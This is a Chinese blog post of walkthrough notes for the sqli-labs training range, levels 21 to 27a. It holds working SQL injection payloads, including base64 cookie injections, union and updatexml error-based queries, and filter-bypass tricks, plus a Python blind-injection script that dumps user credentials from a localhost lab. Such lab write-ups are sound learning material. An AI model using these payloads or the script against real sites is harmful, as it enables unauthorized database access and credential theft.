sqlilabs 通关笔记

已于 2022-05-30 01:24:01 修改
阅读量492 收藏
点赞数 1
分类专栏: sqlilabs靶场闯关记录 文章标签: 安全
于 2022-05-18 21:02:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63253040/article/details/124850953
版权

Less-21

进入环境

admin 000登录进去

这关题目名字是cookie注入,我们可以看见cookie里有uname参数,这里我使用hackbar

并且看见uname的值是被base64加密了,所以我们的注入语句也要进行base64加密

先单引号测试

Jw==

 由此我们根据报错可分析知这题是('')闭合

然后开始爆数据库名字

JykgYW5kIChzZWxlY3QgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpKSkpKSAj

 然后爆数据表

回显数据超过一行,在查询语句后面加上limit 0,1

JykgYW5kIChzZWxlY3QgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCB0YWJsZV9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSBsaW1pdCAwLDEpKSkpICM=

查完四张表后查user表的字段

 查出id,username,password这三个字段

JykgYW5kIChzZWxlY3QgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBjb2x1bW5fbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpIGFuZCB0YWJsZV9uYW1lPSd1c2VycycgbGltaXQgMCwxKSkpKSAj

最后查数据

JykgYW5kIChzZWxlY3QgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQoaWQsdXNlcm5hbWUscGFzc3dvcmQpIGZyb20gc2VjdXJpdHkudXNlcnMgbGltaXQgMCwxKSkpKSAj

Less-22

双引号型的,其他和21关一致

Less-23

输入单引号报错 

测试发现#被过滤了,这里使用'闭合后面的引号,这里是不能使用order by 去查字段数,我们只能用union select 去测

' union select 1,2,3 and '1'='1

' union select 1,(select table_name from information_schema.tables where table_schema=database() limit 0,1),3 and '1'='1

' union select 1,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),3 and '1'='1

' union select 1,(select group_concat(id,username,password) from security.users limit 0,1),3 and '1'='1

 

 

 
Less-24

环境问题,暂时没法复现



Less-25

给个单引号测试

 确定是单引号型,再爆字段数

双写or绕过

 

 

Less-26

单引号,过滤很多东西,这里使用报错注入

'aandnd(updatexml(1,concat(0x7e,database(),0x7e),1));%00

'aandnd(updatexml(1,concat(0x7e,database(),0x7e),1))anandd'1'='1

Less-26a

布尔盲注

import requests
import string
 
url='http://localhost/sqli/Less-26a/'
names='123456789zxcvbnmasdfghjklqwertyuiopZXCVBNMASDFGHJKLQWERTYUIOP,'
i=0
db_name_len=0
print('[+]正在猜解数据库长度......')
while True:
    payload=url+"?id=1')anandd(length(database())=%d)anandd('1"%i
    res=requests.get(payload)
    #print(payload)
    if 'Dumb' in res.text:
        db_name_len=i
        print ('数据库长度为:'+str(db_name_len))
        break
    if i==30:
        print('error!')
        break
    i+=1
 
print("[+]正在猜解数据库名字......")
db_name=''
for i in range(1,db_name_len+1):
    #print(i)
    for k in names:
        # print(k)
        payload=url+"?id=1')anandd(substr(database(),%d,1)='%s')anandd('1"%(i,k)
        res=requests.get(payload)
        #print(payload)
        if 'Dumb' in res.text:
            db_name+=k
            #print(db_name)
            break
print("数据库为: %s"%db_name)
 
print("[+]正在猜解数据表名字......")
table_name=''
for i in range(1,30):
    #print(i)
    for k in range(65,123):
        # print(k)
        payload=url+"?id=1')anandd(ascii(mid((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='security')),%d,1))=%d)anandd('1')=('1"%(i,k)
        res=requests.get(payload)
        #print(payload)
        if 'Dumb' in res.text:
            table_name+=chr(k)
            #print(db_name)
            break
print("数据表为: %s"%table_name)
 
print("[+]正在猜解字段名......")
column_name=''
for i in range(1,30):
    #print(i)
    for k in range(65,123):
        # print(k)
        payload=url+"?id=1')anandd(ascii(mid((select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema='security')anandd(table_name='users')),%d,1))=%d)anandd('1')=('1"%(i,k)
        res=requests.get(payload)
        #print(payload)
        if 'Dumb' in res.text:
            column_name+=chr(k)
            #print(db_name)
            break
print("字段为: %s"%column_name)
 

print("[+]正在猜解数据......")
flag_name=''
for i in range(1,30):
    #print(i)
    for k in range(65,123):
        # print(k)
        payload=url+"?id=1')anandd(ascii(mid((select(group_concat(id,username,passwoorrd))from(security.users)),%d,1))=%d)anandd('1')=('1"%(i,k)
        res=requests.get(payload)
        #print(payload)
        if 'Dumb' in res.text:
            flag_name+=chr(k)
            #print(db_name)
            break
print("数据为: %s"%flag_name)

Less-27

存在报错回显,单引号测出是'字符型,空格又被过滤,直接用报错注入

union被过滤了,不能双写绕过,这里可以大小写绕过

?id='and(updatexml(1,concat(0x7e,(seLeCt(group_concat(id,0x7e,username,0x7e,password))from(security.users)where(id='3'))),1))and'1'='1

Less-27a

双引号报错,但是不会显示错误,关闭了错误回显

过滤了空格,union,select等等

今天终于搞好掉了%0a不能绕过空格的问题,把php版本从7.3.4换回了5.4.45,在师兄帮助下成功

?id="%0AUniOn%0ASelEcT%0A1,(SelEct%0Agroup_concat(id,username,password)%0Afrom%0Asecurity.users),3%0Aand"1

白塔河冲浪手
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
sqli-lab通关笔记
SYJ_361的博客
12-15 2582
sqli-lab通关笔记前6关 Less-1–基于单引号的字符型注入 配置信息 ​ 在Lsee-1目录下的index.php中配置 echo $sql; echo "<br>"; 用于在网页显示sql语句 初始界面 上面提示: Please input the ID as parameter with numeric value 意思是我们应该输入一个ID信息 输入ID后的界面 首先,按F12–【hackbar】 然后,Load加载网页地址到URL上 在URL上输入【 ?id=1
Sqli-labs全套(1-65)-通关笔记
TyRant的博客
04-10 4284
Basic Challenges 01-Error Based-Single quotes Error Based: 可以通过报错知道闭合方式 > paylod: ?id=1') and ;--+ 源码拼接后: SELECT * FROM users WHERE id=('$id') LIMIT 0,1; SELECT * FROM users WHERE id=('1') and ;-- ') LIMIT 0,1; > err: You have an error in your SQL
Sqli-LABS通关笔录-13
aiquan9342的博客
12-05 107
输入账号:'123密码:456就报错了,报错如下所示: 跟刚才一样的。双引号换成了单引号而已。 注入为布尔型盲注,可以使用二分法注入 THE END 转载于:https://www.cnblogs.com/xishaonian/p/6132967.html...
Sqli-Labs 通关笔记
m0_43397796的博客
08-07 2365
Sqli-Labs靶场
通过sqli-labs学习sql注入——基础挑战之less1-10
giantbranch的专栏
05-02 5万+
欢迎光顾我的新博客:https://www.giantbranch.cn 本文链接:http://blog.csdn.net/u012763794/article/details/51207833 虽然sql注入接触过不少,其实也不太多,但是不系统,那就通过sqli-libs系统学习总结一下吧 注:第一个就说得详细一点,后面的有新知识才会说,所以第一个一定要看!!!如果第一个还有不明白的地方...
sqlilabs过关手册注入天书,过关sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中...
sqlilabs过关手册注入天书
08-17
sqlilabs过关手册注入天书
sqlilabs过关手册注入天书.pdf
09-14
sqlilabs过关手册注入天书.pdf
sqlilabs.rar
07-04
sql-lab新版靶场,可以自己搭在虚拟机上练习sql注入
SQLi Labs实验指导书
11-02
SQLi Labs 通关过程 最好的文档,1-37课解答过程,言简意赅。大佬对不住,我把你的辛苦拿来换币了
sqli-lab教程——1-35通关Writeup
热门推荐
地址ch3nye.top
09-11 10万+
刚做sqli-lab的时候,我逛了几个博客论坛没找到什么特别完整的教程,在这里写一篇更完整的教程。 本教程中使用到的大部分函数可以在我的 sql注入入门必备基础知识中找到具体说明和使用方法。 一些术语使用错误请见谅。 一些题目有多种方法,本人也是在学习当中,我会尽可能补全,但是精力有限,文章不尽完美,请见谅。 目录 Page-1(Basic Challenges) Less-1 ...
sqli-labs 1-4通关笔记
XIAO_W_X的博客
10-27 300
background Mysql 有一个系统数据库information_schema,存储着所有的数据库的相关信息,一般的, 我们利用该表可以进行一次完整的注入。以下为一般的流程。 实例 select table_name from information_schema.tables where table_schema = "s ecurity"; //查出security数据库的所有数据表 ...
sqli-labs通关笔记
m0_55563900的博客
04-04 4517
32关 宽字节注入 正常思路 输入’ " 等等一些特殊符号 输入单引号之后出现了转义,把单引号转义成’,所以要用GBK编码 %df+’ 字段数为3列,然后使用联合查询就可以了
SQLi-Labs通关笔记
Lethe's Blog
07-26 1891
Less-1 ?id=1' 单引号报错,存在注入 ?id=1' order by 4 %23'报错,存在三列 ?id=-1' union select 1,2,3%23 发现2和3的位置可以回显,于是进行注入 ?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where ta...
sqli-lab详解——做题笔记11-20
Dream__Catcher的博客
10-12 1050
这部分的题目都是通过POST方法注入 less-11 基于报错-单引号字符串 在user或者password栏中输入 1’ or 1=1 # 获取信息: 1’ or 1=1 LIMIT 2,1 #2可换成需要的数字 还可以用盲注的方法获得信息(后面补充) less-12 基于报错-双引号字符串变式 在user或者password栏中输入 2&amp;amp;quot;) or 1=1 # less-13 双注入-单引号字符...
sqli-lab详解——做题笔记1-10(入门级注解)
Dream__Catcher的博客
10-09 2516
less-1 单引号报错注入 源码:SELECT * FROM users WHERE id=’$id’ LIMIT 0,1 答案及解析: http://127.0.0.1/sqli-labs-master/Less-1/?id= ’ or ‘1’=‘1 ’ or 1=1 --+ (–后要加空格才能注释,但是在网址栏输入时最后加空格解析时会被去掉,所以用+,当然用%20也行) ’ or 1=...
sqli-labs解题笔记~训练篇
YIGAOYU的博客
08-25 512
目录sqli-labs解题笔记~训练篇前言sql注入方式判断是否存在sql注入Less-1order by子句快速猜解表中的列数union select语句回显mysql函数爆mysql版本和操作系统信息爆数据库用户名和数据库名爆数据库路径显示位空显爆库名爆表名爆列名爆数据结语 sqli-labs解题笔记~训练篇 前言 经过了两个阶段的过渡,现在可以使用靶场进行训练试试 我所使用的靶场是使用vulstudy搭建的,也可以使用phpstudy搭建线下的靶场。 具体搭建方法不提了,再回顾一下sql注入方式,以及
sqli-labs通关wp
D-R0s1的博客
04-11 6449
第一关: 方法一:在id=1后面加一个单引号后发现报错 然后把这个单引号注释掉试一下 使用'or 1=1--+ order by 查列数页面显示正常了。存在注入,先查一下列数 http://127.0.0.1/sqli-labs/Less-1/?id=1%27%20order%20by%203--+ 使用单引号闭合掉一个单引号,在用--+或#或%27注释掉一个,便可以使中间的order...
sqlilabs靶场通关
最新发布
09-26
通关Sqlilabs靶场,你需要按照每个关卡的要求,使用适当的SQL注入技巧来绕过安全防护并获取相应的信息。每个关卡都有不同的目标,你需要分析目标页面的参数,并尝试构造恰当的SQL注入语句来实现目标。 因为Sqli...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值